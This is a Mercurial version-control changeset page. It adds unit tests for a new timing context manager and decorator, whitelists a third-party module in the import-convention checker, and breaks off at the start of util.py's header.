##// END OF EJS Templates
util: create a context manager to handle timing...
Martijn Pieters -
r38833:8751d1e2 default
parent child Browse files
Show More
@@ -0,0 +1,135 b''
1 # unit tests for mercuril.util utilities
2 from __future__ import absolute_import
3
4 import contextlib
5 import itertools
6 import unittest
7
8 from mercurial import pycompat, util, utils
9
10 @contextlib.contextmanager
11 def mocktimer(incr=0.1, *additional_targets):
12 """Replaces util.timer and additional_targets with a mock
13
14 The timer starts at 0. On each call the time incremented by the value
15 of incr. If incr is an iterable, then the time is incremented by the
16 next value from that iterable, looping in a cycle when reaching the end.
17
18 additional_targets must be a sequence of (object, attribute_name) tuples;
19 the mock is set with setattr(object, attribute_name, mock).
20
21 """
22 time = [0]
23 try:
24 incr = itertools.cycle(incr)
25 except TypeError:
26 incr = itertools.repeat(incr)
27
28 def timer():
29 time[0] += next(incr)
30 return time[0]
31
32 # record original values
33 orig = util.timer
34 additional_origs = [(o, a, getattr(o, a)) for o, a in additional_targets]
35
36 # mock out targets
37 util.timer = timer
38 for obj, attr in additional_targets:
39 setattr(obj, attr, timer)
40
41 try:
42 yield
43 finally:
44 # restore originals
45 util.timer = orig
46 for args in additional_origs:
47 setattr(*args)
48
49 # attr.s default factory for util.timedstats.start binds the timer we
50 # need to mock out.
51 _start_default = (util.timedcmstats.start.default, 'factory')
52
53 @contextlib.contextmanager
54 def capturestderr():
55 """Replace utils.procutil.stderr with a pycompat.bytesio instance
56
57 The instance is made available as the return value of __enter__.
58
59 This contextmanager is reentrant.
60
61 """
62 orig = utils.procutil.stderr
63 utils.procutil.stderr = pycompat.bytesio()
64 try:
65 yield utils.procutil.stderr
66 finally:
67 utils.procutil.stderr = orig
68
69 class timedtests(unittest.TestCase):
70 def testtimedcmstatsstr(self):
71 stats = util.timedcmstats()
72 self.assertEqual(str(stats), '<unknown>')
73 stats.elapsed = 12.34
74 self.assertEqual(str(stats), util.timecount(12.34))
75
76 def testtimedcmcleanexit(self):
77 # timestamps 1, 4, elapsed time of 4 - 1 = 3
78 with mocktimer([1, 3], _start_default):
79 with util.timedcm() as stats:
80 # actual context doesn't matter
81 pass
82
83 self.assertEqual(stats.start, 1)
84 self.assertEqual(stats.elapsed, 3)
85 self.assertEqual(stats.level, 1)
86
87 def testtimedcmnested(self):
88 # timestamps 1, 3, 6, 10, elapsed times of 6 - 3 = 3 and 10 - 1 = 9
89 with mocktimer([1, 2, 3, 4], _start_default):
90 with util.timedcm() as outer_stats:
91 with util.timedcm() as inner_stats:
92 # actual context doesn't matter
93 pass
94
95 self.assertEqual(outer_stats.start, 1)
96 self.assertEqual(outer_stats.elapsed, 9)
97 self.assertEqual(outer_stats.level, 1)
98
99 self.assertEqual(inner_stats.start, 3)
100 self.assertEqual(inner_stats.elapsed, 3)
101 self.assertEqual(inner_stats.level, 2)
102
103 def testtimedcmexception(self):
104 # timestamps 1, 4, elapsed time of 4 - 1 = 3
105 with mocktimer([1, 3], _start_default):
106 try:
107 with util.timedcm() as stats:
108 raise ValueError()
109 except ValueError:
110 pass
111
112 self.assertEqual(stats.start, 1)
113 self.assertEqual(stats.elapsed, 3)
114 self.assertEqual(stats.level, 1)
115
116 def testtimeddecorator(self):
117 @util.timed
118 def testfunc(callcount=1):
119 callcount -= 1
120 if callcount:
121 testfunc(callcount)
122
123 # timestamps 1, 2, 3, 4, elapsed time of 3 - 2 = 1 and 4 - 1 = 3
124 with mocktimer(1, _start_default):
125 with capturestderr() as out:
126 testfunc(2)
127
128 self.assertEqual(out.getvalue(), (
129 b' testfunc: 1.000 s\n'
130 b' testfunc: 3.000 s\n'
131 ))
132
133 if __name__ == '__main__':
134 import silenttestrunner
135 silenttestrunner.main(__name__)
@@ -1,781 +1,782 b''
1 1 #!/usr/bin/env python
2 2
3 3 from __future__ import absolute_import, print_function
4 4
5 5 import ast
6 6 import collections
7 7 import os
8 8 import re
9 9 import sys
10 10
11 11 # Import a minimal set of stdlib modules needed for list_stdlib_modules()
12 12 # to work when run from a virtualenv. The modules were chosen empirically
13 13 # so that the return value matches the return value without virtualenv.
14 14 if True: # disable lexical sorting checks
15 15 try:
16 16 import BaseHTTPServer as basehttpserver
17 17 except ImportError:
18 18 basehttpserver = None
19 19 import zlib
20 20
21 21 # Whitelist of modules that symbols can be directly imported from.
22 22 allowsymbolimports = (
23 23 '__future__',
24 24 'bzrlib',
25 25 'hgclient',
26 26 'mercurial',
27 27 'mercurial.hgweb.common',
28 28 'mercurial.hgweb.request',
29 29 'mercurial.i18n',
30 30 'mercurial.node',
31 31 # for cffi modules to re-export pure functions
32 32 'mercurial.pure.base85',
33 33 'mercurial.pure.bdiff',
34 34 'mercurial.pure.mpatch',
35 35 'mercurial.pure.osutil',
36 36 'mercurial.pure.parsers',
37 37 # third-party imports should be directly imported
38 38 'mercurial.thirdparty',
39 'mercurial.thirdparty.attr',
39 40 'mercurial.thirdparty.cbor',
40 41 'mercurial.thirdparty.cbor.cbor2',
41 42 'mercurial.thirdparty.zope',
42 43 'mercurial.thirdparty.zope.interface',
43 44 )
44 45
45 46 # Whitelist of symbols that can be directly imported.
46 47 directsymbols = (
47 48 'demandimport',
48 49 )
49 50
50 51 # Modules that must be aliased because they are commonly confused with
51 52 # common variables and can create aliasing and readability issues.
52 53 requirealias = {
53 54 'ui': 'uimod',
54 55 }
55 56
56 57 def usingabsolute(root):
57 58 """Whether absolute imports are being used."""
58 59 if sys.version_info[0] >= 3:
59 60 return True
60 61
61 62 for node in ast.walk(root):
62 63 if isinstance(node, ast.ImportFrom):
63 64 if node.module == '__future__':
64 65 for n in node.names:
65 66 if n.name == 'absolute_import':
66 67 return True
67 68
68 69 return False
69 70
70 71 def walklocal(root):
71 72 """Recursively yield all descendant nodes but not in a different scope"""
72 73 todo = collections.deque(ast.iter_child_nodes(root))
73 74 yield root, False
74 75 while todo:
75 76 node = todo.popleft()
76 77 newscope = isinstance(node, ast.FunctionDef)
77 78 if not newscope:
78 79 todo.extend(ast.iter_child_nodes(node))
79 80 yield node, newscope
80 81
81 82 def dotted_name_of_path(path):
82 83 """Given a relative path to a source file, return its dotted module name.
83 84
84 85 >>> dotted_name_of_path('mercurial/error.py')
85 86 'mercurial.error'
86 87 >>> dotted_name_of_path('zlibmodule.so')
87 88 'zlib'
88 89 """
89 90 parts = path.replace(os.sep, '/').split('/')
90 91 parts[-1] = parts[-1].split('.', 1)[0] # remove .py and .so and .ARCH.so
91 92 if parts[-1].endswith('module'):
92 93 parts[-1] = parts[-1][:-6]
93 94 return '.'.join(parts)
94 95
95 96 def fromlocalfunc(modulename, localmods):
96 97 """Get a function to examine which locally defined module the
97 98 target source imports via a specified name.
98 99
99 100 `modulename` is an `dotted_name_of_path()`-ed source file path,
100 101 which may have `.__init__` at the end of it, of the target source.
101 102
102 103 `localmods` is a set of absolute `dotted_name_of_path()`-ed source file
103 104 paths of locally defined (= Mercurial specific) modules.
104 105
105 106 This function assumes that module names not existing in
106 107 `localmods` are from the Python standard library.
107 108
108 109 This function returns the function, which takes `name` argument,
109 110 and returns `(absname, dottedpath, hassubmod)` tuple if `name`
110 111 matches against locally defined module. Otherwise, it returns
111 112 False.
112 113
113 114 It is assumed that `name` doesn't have `.__init__`.
114 115
115 116 `absname` is an absolute module name of specified `name`
116 117 (e.g. "hgext.convert"). This can be used to compose prefix for sub
117 118 modules or so.
118 119
119 120 `dottedpath` is a `dotted_name_of_path()`-ed source file path
120 121 (e.g. "hgext.convert.__init__") of `name`. This is used to look
121 122 module up in `localmods` again.
122 123
123 124 `hassubmod` is whether it may have sub modules under it (for
124 125 convenient, even though this is also equivalent to "absname !=
125 126 dottednpath")
126 127
127 128 >>> localmods = {'foo.__init__', 'foo.foo1',
128 129 ... 'foo.bar.__init__', 'foo.bar.bar1',
129 130 ... 'baz.__init__', 'baz.baz1'}
130 131 >>> fromlocal = fromlocalfunc('foo.xxx', localmods)
131 132 >>> # relative
132 133 >>> fromlocal('foo1')
133 134 ('foo.foo1', 'foo.foo1', False)
134 135 >>> fromlocal('bar')
135 136 ('foo.bar', 'foo.bar.__init__', True)
136 137 >>> fromlocal('bar.bar1')
137 138 ('foo.bar.bar1', 'foo.bar.bar1', False)
138 139 >>> # absolute
139 140 >>> fromlocal('baz')
140 141 ('baz', 'baz.__init__', True)
141 142 >>> fromlocal('baz.baz1')
142 143 ('baz.baz1', 'baz.baz1', False)
143 144 >>> # unknown = maybe standard library
144 145 >>> fromlocal('os')
145 146 False
146 147 >>> fromlocal(None, 1)
147 148 ('foo', 'foo.__init__', True)
148 149 >>> fromlocal('foo1', 1)
149 150 ('foo.foo1', 'foo.foo1', False)
150 151 >>> fromlocal2 = fromlocalfunc('foo.xxx.yyy', localmods)
151 152 >>> fromlocal2(None, 2)
152 153 ('foo', 'foo.__init__', True)
153 154 >>> fromlocal2('bar2', 1)
154 155 False
155 156 >>> fromlocal2('bar', 2)
156 157 ('foo.bar', 'foo.bar.__init__', True)
157 158 """
158 159 if not isinstance(modulename, str):
159 160 modulename = modulename.decode('ascii')
160 161 prefix = '.'.join(modulename.split('.')[:-1])
161 162 if prefix:
162 163 prefix += '.'
163 164 def fromlocal(name, level=0):
164 165 # name is false value when relative imports are used.
165 166 if not name:
166 167 # If relative imports are used, level must not be absolute.
167 168 assert level > 0
168 169 candidates = ['.'.join(modulename.split('.')[:-level])]
169 170 else:
170 171 if not level:
171 172 # Check relative name first.
172 173 candidates = [prefix + name, name]
173 174 else:
174 175 candidates = ['.'.join(modulename.split('.')[:-level]) +
175 176 '.' + name]
176 177
177 178 for n in candidates:
178 179 if n in localmods:
179 180 return (n, n, False)
180 181 dottedpath = n + '.__init__'
181 182 if dottedpath in localmods:
182 183 return (n, dottedpath, True)
183 184 return False
184 185 return fromlocal
185 186
186 187 def populateextmods(localmods):
187 188 """Populate C extension modules based on pure modules"""
188 189 newlocalmods = set(localmods)
189 190 for n in localmods:
190 191 if n.startswith('mercurial.pure.'):
191 192 m = n[len('mercurial.pure.'):]
192 193 newlocalmods.add('mercurial.cext.' + m)
193 194 newlocalmods.add('mercurial.cffi._' + m)
194 195 return newlocalmods
195 196
196 197 def list_stdlib_modules():
197 198 """List the modules present in the stdlib.
198 199
199 200 >>> py3 = sys.version_info[0] >= 3
200 201 >>> mods = set(list_stdlib_modules())
201 202 >>> 'BaseHTTPServer' in mods or py3
202 203 True
203 204
204 205 os.path isn't really a module, so it's missing:
205 206
206 207 >>> 'os.path' in mods
207 208 False
208 209
209 210 sys requires special treatment, because it's baked into the
210 211 interpreter, but it should still appear:
211 212
212 213 >>> 'sys' in mods
213 214 True
214 215
215 216 >>> 'collections' in mods
216 217 True
217 218
218 219 >>> 'cStringIO' in mods or py3
219 220 True
220 221
221 222 >>> 'cffi' in mods
222 223 True
223 224 """
224 225 for m in sys.builtin_module_names:
225 226 yield m
226 227 # These modules only exist on windows, but we should always
227 228 # consider them stdlib.
228 229 for m in ['msvcrt', '_winreg']:
229 230 yield m
230 231 yield '__builtin__'
231 232 yield 'builtins' # python3 only
232 233 yield 'importlib.abc' # python3 only
233 234 yield 'importlib.machinery' # python3 only
234 235 yield 'importlib.util' # python3 only
235 236 for m in 'fcntl', 'grp', 'pwd', 'termios': # Unix only
236 237 yield m
237 238 for m in 'cPickle', 'datetime': # in Python (not C) on PyPy
238 239 yield m
239 240 for m in ['cffi']:
240 241 yield m
241 242 stdlib_prefixes = {sys.prefix, sys.exec_prefix}
242 243 # We need to supplement the list of prefixes for the search to work
243 244 # when run from within a virtualenv.
244 245 for mod in (basehttpserver, zlib):
245 246 if mod is None:
246 247 continue
247 248 try:
248 249 # Not all module objects have a __file__ attribute.
249 250 filename = mod.__file__
250 251 except AttributeError:
251 252 continue
252 253 dirname = os.path.dirname(filename)
253 254 for prefix in stdlib_prefixes:
254 255 if dirname.startswith(prefix):
255 256 # Then this directory is redundant.
256 257 break
257 258 else:
258 259 stdlib_prefixes.add(dirname)
259 260 for libpath in sys.path:
260 261 # We want to walk everything in sys.path that starts with
261 262 # something in stdlib_prefixes.
262 263 if not any(libpath.startswith(p) for p in stdlib_prefixes):
263 264 continue
264 265 for top, dirs, files in os.walk(libpath):
265 266 for i, d in reversed(list(enumerate(dirs))):
266 267 if (not os.path.exists(os.path.join(top, d, '__init__.py'))
267 268 or top == libpath and d in ('hgdemandimport', 'hgext',
268 269 'mercurial')):
269 270 del dirs[i]
270 271 for name in files:
271 272 if not name.endswith(('.py', '.so', '.pyc', '.pyo', '.pyd')):
272 273 continue
273 274 if name.startswith('__init__.py'):
274 275 full_path = top
275 276 else:
276 277 full_path = os.path.join(top, name)
277 278 rel_path = full_path[len(libpath) + 1:]
278 279 mod = dotted_name_of_path(rel_path)
279 280 yield mod
280 281
281 282 stdlib_modules = set(list_stdlib_modules())
282 283
283 284 def imported_modules(source, modulename, f, localmods, ignore_nested=False):
284 285 """Given the source of a file as a string, yield the names
285 286 imported by that file.
286 287
287 288 Args:
288 289 source: The python source to examine as a string.
289 290 modulename: of specified python source (may have `__init__`)
290 291 localmods: set of locally defined module names (may have `__init__`)
291 292 ignore_nested: If true, import statements that do not start in
292 293 column zero will be ignored.
293 294
294 295 Returns:
295 296 A list of absolute module names imported by the given source.
296 297
297 298 >>> f = 'foo/xxx.py'
298 299 >>> modulename = 'foo.xxx'
299 300 >>> localmods = {'foo.__init__': True,
300 301 ... 'foo.foo1': True, 'foo.foo2': True,
301 302 ... 'foo.bar.__init__': True, 'foo.bar.bar1': True,
302 303 ... 'baz.__init__': True, 'baz.baz1': True }
303 304 >>> # standard library (= not locally defined ones)
304 305 >>> sorted(imported_modules(
305 306 ... 'from stdlib1 import foo, bar; import stdlib2',
306 307 ... modulename, f, localmods))
307 308 []
308 309 >>> # relative importing
309 310 >>> sorted(imported_modules(
310 311 ... 'import foo1; from bar import bar1',
311 312 ... modulename, f, localmods))
312 313 ['foo.bar.bar1', 'foo.foo1']
313 314 >>> sorted(imported_modules(
314 315 ... 'from bar.bar1 import name1, name2, name3',
315 316 ... modulename, f, localmods))
316 317 ['foo.bar.bar1']
317 318 >>> # absolute importing
318 319 >>> sorted(imported_modules(
319 320 ... 'from baz import baz1, name1',
320 321 ... modulename, f, localmods))
321 322 ['baz.__init__', 'baz.baz1']
322 323 >>> # mixed importing, even though it shouldn't be recommended
323 324 >>> sorted(imported_modules(
324 325 ... 'import stdlib, foo1, baz',
325 326 ... modulename, f, localmods))
326 327 ['baz.__init__', 'foo.foo1']
327 328 >>> # ignore_nested
328 329 >>> sorted(imported_modules(
329 330 ... '''import foo
330 331 ... def wat():
331 332 ... import bar
332 333 ... ''', modulename, f, localmods))
333 334 ['foo.__init__', 'foo.bar.__init__']
334 335 >>> sorted(imported_modules(
335 336 ... '''import foo
336 337 ... def wat():
337 338 ... import bar
338 339 ... ''', modulename, f, localmods, ignore_nested=True))
339 340 ['foo.__init__']
340 341 """
341 342 fromlocal = fromlocalfunc(modulename, localmods)
342 343 for node in ast.walk(ast.parse(source, f)):
343 344 if ignore_nested and getattr(node, 'col_offset', 0) > 0:
344 345 continue
345 346 if isinstance(node, ast.Import):
346 347 for n in node.names:
347 348 found = fromlocal(n.name)
348 349 if not found:
349 350 # this should import standard library
350 351 continue
351 352 yield found[1]
352 353 elif isinstance(node, ast.ImportFrom):
353 354 found = fromlocal(node.module, node.level)
354 355 if not found:
355 356 # this should import standard library
356 357 continue
357 358
358 359 absname, dottedpath, hassubmod = found
359 360 if not hassubmod:
360 361 # "dottedpath" is not a package; must be imported
361 362 yield dottedpath
362 363 # examination of "node.names" should be redundant
363 364 # e.g.: from mercurial.node import nullid, nullrev
364 365 continue
365 366
366 367 modnotfound = False
367 368 prefix = absname + '.'
368 369 for n in node.names:
369 370 found = fromlocal(prefix + n.name)
370 371 if not found:
371 372 # this should be a function or a property of "node.module"
372 373 modnotfound = True
373 374 continue
374 375 yield found[1]
375 376 if modnotfound:
376 377 # "dottedpath" is a package, but imported because of non-module
377 378 # lookup
378 379 yield dottedpath
379 380
380 381 def verify_import_convention(module, source, localmods):
381 382 """Verify imports match our established coding convention.
382 383
383 384 We have 2 conventions: legacy and modern. The modern convention is in
384 385 effect when using absolute imports.
385 386
386 387 The legacy convention only looks for mixed imports. The modern convention
387 388 is much more thorough.
388 389 """
389 390 root = ast.parse(source)
390 391 absolute = usingabsolute(root)
391 392
392 393 if absolute:
393 394 return verify_modern_convention(module, root, localmods)
394 395 else:
395 396 return verify_stdlib_on_own_line(root)
396 397
397 398 def verify_modern_convention(module, root, localmods, root_col_offset=0):
398 399 """Verify a file conforms to the modern import convention rules.
399 400
400 401 The rules of the modern convention are:
401 402
402 403 * Ordering is stdlib followed by local imports. Each group is lexically
403 404 sorted.
404 405 * Importing multiple modules via "import X, Y" is not allowed: use
405 406 separate import statements.
406 407 * Importing multiple modules via "from X import ..." is allowed if using
407 408 parenthesis and one entry per line.
408 409 * Only 1 relative import statement per import level ("from .", "from ..")
409 410 is allowed.
410 411 * Relative imports from higher levels must occur before lower levels. e.g.
411 412 "from .." must be before "from .".
412 413 * Imports from peer packages should use relative import (e.g. do not
413 414 "import mercurial.foo" from a "mercurial.*" module).
414 415 * Symbols can only be imported from specific modules (see
415 416 `allowsymbolimports`). For other modules, first import the module then
416 417 assign the symbol to a module-level variable. In addition, these imports
417 418 must be performed before other local imports. This rule only
418 419 applies to import statements outside of any blocks.
419 420 * Relative imports from the standard library are not allowed, unless that
420 421 library is also a local module.
421 422 * Certain modules must be aliased to alternate names to avoid aliasing
422 423 and readability problems. See `requirealias`.
423 424 """
424 425 if not isinstance(module, str):
425 426 module = module.decode('ascii')
426 427 topmodule = module.split('.')[0]
427 428 fromlocal = fromlocalfunc(module, localmods)
428 429
429 430 # Whether a local/non-stdlib import has been performed.
430 431 seenlocal = None
431 432 # Whether a local/non-stdlib, non-symbol import has been seen.
432 433 seennonsymbollocal = False
433 434 # The last name to be imported (for sorting).
434 435 lastname = None
435 436 laststdlib = None
436 437 # Relative import levels encountered so far.
437 438 seenlevels = set()
438 439
439 440 for node, newscope in walklocal(root):
440 441 def msg(fmt, *args):
441 442 return (fmt % args, node.lineno)
442 443 if newscope:
443 444 # Check for local imports in function
444 445 for r in verify_modern_convention(module, node, localmods,
445 446 node.col_offset + 4):
446 447 yield r
447 448 elif isinstance(node, ast.Import):
448 449 # Disallow "import foo, bar" and require separate imports
449 450 # for each module.
450 451 if len(node.names) > 1:
451 452 yield msg('multiple imported names: %s',
452 453 ', '.join(n.name for n in node.names))
453 454
454 455 name = node.names[0].name
455 456 asname = node.names[0].asname
456 457
457 458 stdlib = name in stdlib_modules
458 459
459 460 # Ignore sorting rules on imports inside blocks.
460 461 if node.col_offset == root_col_offset:
461 462 if lastname and name < lastname and laststdlib == stdlib:
462 463 yield msg('imports not lexically sorted: %s < %s',
463 464 name, lastname)
464 465
465 466 lastname = name
466 467 laststdlib = stdlib
467 468
468 469 # stdlib imports should be before local imports.
469 470 if stdlib and seenlocal and node.col_offset == root_col_offset:
470 471 yield msg('stdlib import "%s" follows local import: %s',
471 472 name, seenlocal)
472 473
473 474 if not stdlib:
474 475 seenlocal = name
475 476
476 477 # Import of sibling modules should use relative imports.
477 478 topname = name.split('.')[0]
478 479 if topname == topmodule:
479 480 yield msg('import should be relative: %s', name)
480 481
481 482 if name in requirealias and asname != requirealias[name]:
482 483 yield msg('%s module must be "as" aliased to %s',
483 484 name, requirealias[name])
484 485
485 486 elif isinstance(node, ast.ImportFrom):
486 487 # Resolve the full imported module name.
487 488 if node.level > 0:
488 489 fullname = '.'.join(module.split('.')[:-node.level])
489 490 if node.module:
490 491 fullname += '.%s' % node.module
491 492 else:
492 493 assert node.module
493 494 fullname = node.module
494 495
495 496 topname = fullname.split('.')[0]
496 497 if topname == topmodule:
497 498 yield msg('import should be relative: %s', fullname)
498 499
499 500 # __future__ is special since it needs to come first and use
500 501 # symbol import.
501 502 if fullname != '__future__':
502 503 if not fullname or (
503 504 fullname in stdlib_modules
504 505 and fullname not in localmods
505 506 and fullname + '.__init__' not in localmods):
506 507 yield msg('relative import of stdlib module')
507 508 else:
508 509 seenlocal = fullname
509 510
510 511 # Direct symbol import is only allowed from certain modules and
511 512 # must occur before non-symbol imports.
512 513 found = fromlocal(node.module, node.level)
513 514 if found and found[2]: # node.module is a package
514 515 prefix = found[0] + '.'
515 516 symbols = (n.name for n in node.names
516 517 if not fromlocal(prefix + n.name))
517 518 else:
518 519 symbols = (n.name for n in node.names)
519 520 symbols = [sym for sym in symbols if sym not in directsymbols]
520 521 if node.module and node.col_offset == root_col_offset:
521 522 if symbols and fullname not in allowsymbolimports:
522 523 yield msg('direct symbol import %s from %s',
523 524 ', '.join(symbols), fullname)
524 525
525 526 if symbols and seennonsymbollocal:
526 527 yield msg('symbol import follows non-symbol import: %s',
527 528 fullname)
528 529 if not symbols and fullname not in stdlib_modules:
529 530 seennonsymbollocal = True
530 531
531 532 if not node.module:
532 533 assert node.level
533 534
534 535 # Only allow 1 group per level.
535 536 if (node.level in seenlevels
536 537 and node.col_offset == root_col_offset):
537 538 yield msg('multiple "from %s import" statements',
538 539 '.' * node.level)
539 540
540 541 # Higher-level groups come before lower-level groups.
541 542 if any(node.level > l for l in seenlevels):
542 543 yield msg('higher-level import should come first: %s',
543 544 fullname)
544 545
545 546 seenlevels.add(node.level)
546 547
547 548 # Entries in "from .X import ( ... )" lists must be lexically
548 549 # sorted.
549 550 lastentryname = None
550 551
551 552 for n in node.names:
552 553 if lastentryname and n.name < lastentryname:
553 554 yield msg('imports from %s not lexically sorted: %s < %s',
554 555 fullname, n.name, lastentryname)
555 556
556 557 lastentryname = n.name
557 558
558 559 if n.name in requirealias and n.asname != requirealias[n.name]:
559 560 yield msg('%s from %s must be "as" aliased to %s',
560 561 n.name, fullname, requirealias[n.name])
561 562
562 563 def verify_stdlib_on_own_line(root):
563 564 """Given some python source, verify that stdlib imports are done
564 565 in separate statements from relative local module imports.
565 566
566 567 >>> list(verify_stdlib_on_own_line(ast.parse('import sys, foo')))
567 568 [('mixed imports\\n stdlib: sys\\n relative: foo', 1)]
568 569 >>> list(verify_stdlib_on_own_line(ast.parse('import sys, os')))
569 570 []
570 571 >>> list(verify_stdlib_on_own_line(ast.parse('import foo, bar')))
571 572 []
572 573 """
573 574 for node in ast.walk(root):
574 575 if isinstance(node, ast.Import):
575 576 from_stdlib = {False: [], True: []}
576 577 for n in node.names:
577 578 from_stdlib[n.name in stdlib_modules].append(n.name)
578 579 if from_stdlib[True] and from_stdlib[False]:
579 580 yield ('mixed imports\n stdlib: %s\n relative: %s' %
580 581 (', '.join(sorted(from_stdlib[True])),
581 582 ', '.join(sorted(from_stdlib[False]))), node.lineno)
582 583
583 584 class CircularImport(Exception):
584 585 pass
585 586
586 587 def checkmod(mod, imports):
587 588 shortest = {}
588 589 visit = [[mod]]
589 590 while visit:
590 591 path = visit.pop(0)
591 592 for i in sorted(imports.get(path[-1], [])):
592 593 if len(path) < shortest.get(i, 1000):
593 594 shortest[i] = len(path)
594 595 if i in path:
595 596 if i == path[0]:
596 597 raise CircularImport(path)
597 598 continue
598 599 visit.append(path + [i])
599 600
600 601 def rotatecycle(cycle):
601 602 """arrange a cycle so that the lexicographically first module listed first
602 603
603 604 >>> rotatecycle(['foo', 'bar'])
604 605 ['bar', 'foo', 'bar']
605 606 """
606 607 lowest = min(cycle)
607 608 idx = cycle.index(lowest)
608 609 return cycle[idx:] + cycle[:idx] + [lowest]
609 610
610 611 def find_cycles(imports):
611 612 """Find cycles in an already-loaded import graph.
612 613
613 614 All module names recorded in `imports` should be absolute one.
614 615
615 616 >>> from __future__ import print_function
616 617 >>> imports = {'top.foo': ['top.bar', 'os.path', 'top.qux'],
617 618 ... 'top.bar': ['top.baz', 'sys'],
618 619 ... 'top.baz': ['top.foo'],
619 620 ... 'top.qux': ['top.foo']}
620 621 >>> print('\\n'.join(sorted(find_cycles(imports))))
621 622 top.bar -> top.baz -> top.foo -> top.bar
622 623 top.foo -> top.qux -> top.foo
623 624 """
624 625 cycles = set()
625 626 for mod in sorted(imports.keys()):
626 627 try:
627 628 checkmod(mod, imports)
628 629 except CircularImport as e:
629 630 cycle = e.args[0]
630 631 cycles.add(" -> ".join(rotatecycle(cycle)))
631 632 return cycles
632 633
633 634 def _cycle_sortkey(c):
634 635 return len(c), c
635 636
636 637 def embedded(f, modname, src):
637 638 """Extract embedded python code
638 639
639 640 >>> def _forcestr(thing):
640 641 ... if not isinstance(thing, str):
641 642 ... return thing.decode('ascii')
642 643 ... return thing
643 644 >>> def test(fn, lines):
644 645 ... for s, m, f, l in embedded(fn, b"example", lines):
645 646 ... print("%s %s %d" % (_forcestr(m), _forcestr(f), l))
646 647 ... print(repr(_forcestr(s)))
647 648 >>> lines = [
648 649 ... b'comment',
649 650 ... b' >>> from __future__ import print_function',
650 651 ... b" >>> ' multiline",
651 652 ... b" ... string'",
652 653 ... b' ',
653 654 ... b'comment',
654 655 ... b' $ cat > foo.py <<EOF',
655 656 ... b' > from __future__ import print_function',
656 657 ... b' > EOF',
657 658 ... ]
658 659 >>> test(b"example.t", lines)
659 660 example[2] doctest.py 2
660 661 "from __future__ import print_function\\n' multiline\\nstring'\\n"
661 662 example[7] foo.py 7
662 663 'from __future__ import print_function\\n'
663 664 """
664 665 inlinepython = 0
665 666 shpython = 0
666 667 script = []
667 668 prefix = 6
668 669 t = ''
669 670 n = 0
670 671 for l in src:
671 672 n += 1
672 673 if not l.endswith(b'\n'):
673 674 l += b'\n'
674 675 if l.startswith(b' >>> '): # python inlines
675 676 if shpython:
676 677 print("%s:%d: Parse Error" % (f, n))
677 678 if not inlinepython:
678 679 # We've just entered a Python block.
679 680 inlinepython = n
680 681 t = b'doctest.py'
681 682 script.append(l[prefix:])
682 683 continue
683 684 if l.startswith(b' ... '): # python inlines
684 685 script.append(l[prefix:])
685 686 continue
686 687 cat = re.search(br"\$ \s*cat\s*>\s*(\S+\.py)\s*<<\s*EOF", l)
687 688 if cat:
688 689 if inlinepython:
689 690 yield b''.join(script), (b"%s[%d]" %
690 691 (modname, inlinepython)), t, inlinepython
691 692 script = []
692 693 inlinepython = 0
693 694 shpython = n
694 695 t = cat.group(1)
695 696 continue
696 697 if shpython and l.startswith(b' > '): # sh continuation
697 698 if l == b' > EOF\n':
698 699 yield b''.join(script), (b"%s[%d]" %
699 700 (modname, shpython)), t, shpython
700 701 script = []
701 702 shpython = 0
702 703 else:
703 704 script.append(l[4:])
704 705 continue
705 706 # If we have an empty line or a command for sh, we end the
706 707 # inline script.
707 708 if inlinepython and (l == b' \n'
708 709 or l.startswith(b' $ ')):
709 710 yield b''.join(script), (b"%s[%d]" %
710 711 (modname, inlinepython)), t, inlinepython
711 712 script = []
712 713 inlinepython = 0
713 714 continue
714 715
715 716 def sources(f, modname):
716 717 """Yields possibly multiple sources from a filepath
717 718
718 719 input: filepath, modulename
719 720 yields: script(string), modulename, filepath, linenumber
720 721
721 722 For embedded scripts, the modulename and filepath will be different
722 723 from the function arguments. linenumber is an offset relative to
723 724 the input file.
724 725 """
725 726 py = False
726 727 if not f.endswith('.t'):
727 728 with open(f, 'rb') as src:
728 729 yield src.read(), modname, f, 0
729 730 py = True
730 731 if py or f.endswith('.t'):
731 732 with open(f, 'rb') as src:
732 733 for script, modname, t, line in embedded(f, modname, src):
733 734 yield script, modname, t, line
734 735
735 736 def main(argv):
736 737 if len(argv) < 2 or (argv[1] == '-' and len(argv) > 2):
737 738 print('Usage: %s {-|file [file] [file] ...}')
738 739 return 1
739 740 if argv[1] == '-':
740 741 argv = argv[:1]
741 742 argv.extend(l.rstrip() for l in sys.stdin.readlines())
742 743 localmodpaths = {}
743 744 used_imports = {}
744 745 any_errors = False
745 746 for source_path in argv[1:]:
746 747 modname = dotted_name_of_path(source_path)
747 748 localmodpaths[modname] = source_path
748 749 localmods = populateextmods(localmodpaths)
749 750 for localmodname, source_path in sorted(localmodpaths.items()):
750 751 if not isinstance(localmodname, bytes):
751 752 # This is only safe because all hg's files are ascii
752 753 localmodname = localmodname.encode('ascii')
753 754 for src, modname, name, line in sources(source_path, localmodname):
754 755 try:
755 756 used_imports[modname] = sorted(
756 757 imported_modules(src, modname, name, localmods,
757 758 ignore_nested=True))
758 759 for error, lineno in verify_import_convention(modname, src,
759 760 localmods):
760 761 any_errors = True
761 762 print('%s:%d: %s' % (source_path, lineno + line, error))
762 763 except SyntaxError as e:
763 764 print('%s:%d: SyntaxError: %s' %
764 765 (source_path, e.lineno + line, e))
765 766 cycles = find_cycles(used_imports)
766 767 if cycles:
767 768 firstmods = set()
768 769 for c in sorted(cycles, key=_cycle_sortkey):
769 770 first = c.split()[0]
770 771 # As a rough cut, ignore any cycle that starts with the
771 772 # same module as some other cycle. Otherwise we see lots
772 773 # of cycles that are effectively duplicates.
773 774 if first in firstmods:
774 775 continue
775 776 print('Import cycle:', c)
776 777 firstmods.add(first)
777 778 any_errors = True
778 779 return any_errors != 0
779 780
780 781 if __name__ == '__main__':
781 782 sys.exit(int(main(sys.argv)))
@@ -1,3838 +1,3869 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
